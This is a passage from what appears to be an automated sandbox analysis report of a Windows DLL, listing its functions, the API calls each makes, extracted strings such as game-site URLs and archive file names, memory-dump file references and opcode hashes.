                                                                                                                                      • Instruction Fuzzy Hash: 53115674604240AFDB24DB649A5ABEF37A8AF8A308F90410DE9AEC71C0EF715009C783
                                                                                                                                      Function 69ED005F Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 69ED0087
                                                                                                                                        • Part of subcall function 69EC398D: __getptd.LIBCMT ref: 69EC399B
                                                                                                                                        • Part of subcall function 69EC398D: __getptd.LIBCMT ref: 69EC39A9
                                                                                                                                      • __getptd.LIBCMT ref: 69ED0091
                                                                                                                                        • Part of subcall function 69EC7833: __getptd_noexit.LIBCMT ref: 69EC7836
                                                                                                                                        • Part of subcall function 69EC7833: __amsg_exit.LIBCMT ref: 69EC7843
                                                                                                                                      • __getptd.LIBCMT ref: 69ED009F
                                                                                                                                      • __getptd.LIBCMT ref: 69ED00AD
                                                                                                                                      • __getptd.LIBCMT ref: 69ED00B8
                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 69ED00DE
                                                                                                                                        • Part of subcall function 69EC3A32: __CallSettingFrame@12.LIBCMT ref: 69EC3A7E
                                                                                                                                        • Part of subcall function 69ED0185: __getptd.LIBCMT ref: 69ED0194
                                                                                                                                        • Part of subcall function 69ED0185: __getptd.LIBCMT ref: 69ED01A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                      • Opcode ID: 5372368acb66d6d558fdf7d54b20e21f4b773d13a4de108c346080baf54e0b11
                                                                                                                                      • Instruction ID: e0d406ba08a867ac09149fd26fba005542077ab266e57da7010f21ca240749fa
                                                                                                                                      • Opcode Fuzzy Hash: 5372368acb66d6d558fdf7d54b20e21f4b773d13a4de108c346080baf54e0b11
                                                                                                                                      • Instruction Fuzzy Hash: 37112675C04209EFDB00DFA4C944BDDBBB1FF04315F609069E964AB250DB398A11CF91
                                                                                                                                      Function 69EB6B4A Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 69EB6B5B
                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 69EB6B6F
                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 69EB6B7F
                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 69EB6B91
                                                                                                                                      • PtInRect.USER32(?,?,?), ref: 69EB6BA1
                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 69EB6BAE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1315500227-0
                                                                                                                                      • Opcode ID: 87a1c4e9a4b046ad4492636a5ea11a61541b155b4b65dabd04460ef2b41bb06f
                                                                                                                                      • Instruction ID: 9a52224fb5063b0ffe7458a5dc6b622e045a05d9c18b286e1e251955e47c4b01
                                                                                                                                      • Opcode Fuzzy Hash: 87a1c4e9a4b046ad4492636a5ea11a61541b155b4b65dabd04460ef2b41bb06f
                                                                                                                                      • Instruction Fuzzy Hash: C501AD32940919BBCF029B54DE4CE9E3B7CEF46B74F104020F921EA184EB34DA168BA4
                                                                                                                                      Function 69EBB89E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
                                                                                                                                      • API String ID: 2102423945-455206835
                                                                                                                                      • Opcode ID: 3493942e85c6026d1080ee5b3c0f950bb96e2e7bffdf472ec75b38acdaa94621
                                                                                                                                      • Instruction ID: 529895d97791a17f0897beeb754681fd19c8caa58cd542668bcce45f55734e8d
                                                                                                                                      • Opcode Fuzzy Hash: 3493942e85c6026d1080ee5b3c0f950bb96e2e7bffdf472ec75b38acdaa94621
                                                                                                                                      • Instruction Fuzzy Hash: B49114B5D0121DAADB41CFE4D6C5BDEBBF8AF04348F348169E919EA284E774C644C7A0
                                                                                                                                      Function 69EA0000 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA002E
                                                                                                                                        • Part of subcall function 69E9DA10: GetModuleHandleA.KERNEL32 ref: 69E9DACA
                                                                                                                                        • Part of subcall function 69E9DA10: GetProcAddress.KERNEL32(00000000), ref: 69E9DAD1
                                                                                                                                      • _memset.LIBCMT ref: 69EA0093
                                                                                                                                      • _memset.LIBCMT ref: 69EA00AA
                                                                                                                                      • _memset.LIBCMT ref: 69EA00C7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$AddressHandleModuleProc
                                                                                                                                      • String ID: http://www.GameM2.com
                                                                                                                                      • API String ID: 1149923269-1246133499
                                                                                                                                      • Opcode ID: 758674d16baeb83b845d8e5686a9c58044dc9221bfbd9259fc4e4f78925f7815
                                                                                                                                      • Instruction ID: 21bc0089f20879f426a2a77c6d46a63e81087ff738ffac8c334f3de1db77c113
                                                                                                                                      • Opcode Fuzzy Hash: 758674d16baeb83b845d8e5686a9c58044dc9221bfbd9259fc4e4f78925f7815
                                                                                                                                      • Instruction Fuzzy Hash: 92416AB55082406BE321C7309E55FEB77DC9FA6308F64896DE988CB251FA31960CC7E2
                                                                                                                                      Function 69E8AFC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E8AFCC
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69E8AFFB
                                                                                                                                      • _strncpy.LIBCMT ref: 69E8B082
                                                                                                                                      • _strncpy.LIBCMT ref: 69E8B0A4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strncpy$AllocateHeap_malloc_memset
                                                                                                                                      • String ID: p
                                                                                                                                      • API String ID: 1584081992-2181537457
                                                                                                                                      • Opcode ID: f469740fa4e9aaf1b2f44fdd18ff9e30ee4e16574a5b1e162071e10fc9a1b88e
                                                                                                                                      • Instruction ID: 1b573d0f4d15b43408bc665831f43a353622dd6de5b9c75abe3add89e634fd4e
                                                                                                                                      • Opcode Fuzzy Hash: f469740fa4e9aaf1b2f44fdd18ff9e30ee4e16574a5b1e162071e10fc9a1b88e
                                                                                                                                      • Instruction Fuzzy Hash: 0631F475A04315DBC700CE659A54AA777A8AF81318F28856CEC594B341EB36E90CC7D2
                                                                                                                                      Function 69E9FD80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9FDAE
                                                                                                                                        • Part of subcall function 69E9DA10: GetModuleHandleA.KERNEL32 ref: 69E9DACA
                                                                                                                                        • Part of subcall function 69E9DA10: GetProcAddress.KERNEL32(00000000), ref: 69E9DAD1
                                                                                                                                      • _memset.LIBCMT ref: 69E9FE0D
                                                                                                                                      • _memset.LIBCMT ref: 69E9FE2A
                                                                                                                                      • _memset.LIBCMT ref: 69E9FE47
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$AddressHandleModuleProc
                                                                                                                                      • String ID: http://www.A3M2.com
                                                                                                                                      • API String ID: 1149923269-8747486
                                                                                                                                      • Opcode ID: 45632248e2da63190c59fc412e7ae530b7c8306d416a99d96b71875f6cbfe201
                                                                                                                                      • Instruction ID: 237b69ab589be4392ae44306fe1931bfdb8d7af97e00f7aa009f182b9b8eed26
                                                                                                                                      • Opcode Fuzzy Hash: 45632248e2da63190c59fc412e7ae530b7c8306d416a99d96b71875f6cbfe201
                                                                                                                                      • Instruction Fuzzy Hash: A231D7B65082446AE320D6249D42FEF77DC9F98318F548D2DBA9887281F6749A0887E3
                                                                                                                                      Function 69E8AB40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strncpy
                                                                                                                                      • String ID: jdgg.rar$shgg.rar$wqgg.rar$ydgg.rar
                                                                                                                                      • API String ID: 2961919466-2876948086
                                                                                                                                      • Opcode ID: 1457d1cf812e926ebee5299d82cd7d39cfecb5543562957fb88bc46250777d86
                                                                                                                                      • Instruction ID: d018df3f95f9f57952bae0c8a69c9f110a4e876f4c558c8f4faf8ea9fbce44f6
                                                                                                                                      • Opcode Fuzzy Hash: 1457d1cf812e926ebee5299d82cd7d39cfecb5543562957fb88bc46250777d86
                                                                                                                                      • Instruction Fuzzy Hash: E931F2359447019BD702CA54DF19BE233EAAB45328F24C99EE88E87290E735E54DCBC1
                                                                                                                                      Function 69E9FB00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9FB2E
                                                                                                                                        • Part of subcall function 69E9DA10: GetModuleHandleA.KERNEL32 ref: 69E9DACA
                                                                                                                                        • Part of subcall function 69E9DA10: GetProcAddress.KERNEL32(00000000), ref: 69E9DAD1
                                                                                                                                      • _memset.LIBCMT ref: 69E9FB8D
                                                                                                                                      • _memset.LIBCMT ref: 69E9FBAA
                                                                                                                                      • _memset.LIBCMT ref: 69E9FBC7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$AddressHandleModuleProc
                                                                                                                                      • String ID: http://www.ksfm2.com
                                                                                                                                      • API String ID: 1149923269-2030630099
                                                                                                                                      • Opcode ID: 9233837abd4aa3b23db2071e36559c26b9baded38ef94c2a1a01bc02f741a3c7
                                                                                                                                      • Instruction ID: d7c1de7bc887f96e787d650ae768be125a8736eeaff84dd962ee1b728cb4e6b7
                                                                                                                                      • Opcode Fuzzy Hash: 9233837abd4aa3b23db2071e36559c26b9baded38ef94c2a1a01bc02f741a3c7
                                                                                                                                      • Instruction Fuzzy Hash: C931E8B55082405AE360D624AD42FEFB7DC9F94308F549D2DE99987241EA349A0887E7
                                                                                                                                      Function 69E9FC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9FC6E
                                                                                                                                        • Part of subcall function 69E9DA10: GetModuleHandleA.KERNEL32 ref: 69E9DACA
                                                                                                                                        • Part of subcall function 69E9DA10: GetProcAddress.KERNEL32(00000000), ref: 69E9DAD1
                                                                                                                                      • _memset.LIBCMT ref: 69E9FCD3
                                                                                                                                      • _memset.LIBCMT ref: 69E9FCEA
                                                                                                                                      • _memset.LIBCMT ref: 69E9FD07
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
